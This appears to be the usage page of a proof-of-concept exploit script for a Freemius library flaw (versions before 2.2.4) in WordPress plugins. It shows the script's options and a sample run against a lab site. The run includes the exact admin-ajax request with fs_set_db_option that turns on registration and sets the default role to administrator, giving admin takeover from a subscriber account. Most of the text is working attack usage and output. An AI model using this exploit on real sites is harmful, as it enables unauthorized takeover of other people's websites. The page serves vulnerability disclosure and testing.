Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
The library, used in numerous plugins, does not have proper authorization when updating blog options, allowing any authenticated users, such as a subscriber, to update arbitrary options.
usage: exploit.py [-h] -u URL [-un USERNAME] [-p PASSWORD] [-f FIX]
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update Description: The library, used in numerous plugins, does not have proper authorization when updating blog
options, allowing any authenticated users, such as a subscriber, to update arbitrary options.
options:
-h, --help show this help message and exit
-u URL, --url URL Website URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-f FIX, --fix FIX Reset after Exploit
$ python3 exploit.py -u http://wordpress.lan -un user -p useruser1
Plugin: wp-affiliate-disclosure Version: 1.1.4 Not found.
Info: Using plugin 404-to-301 running version 3.0.1
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.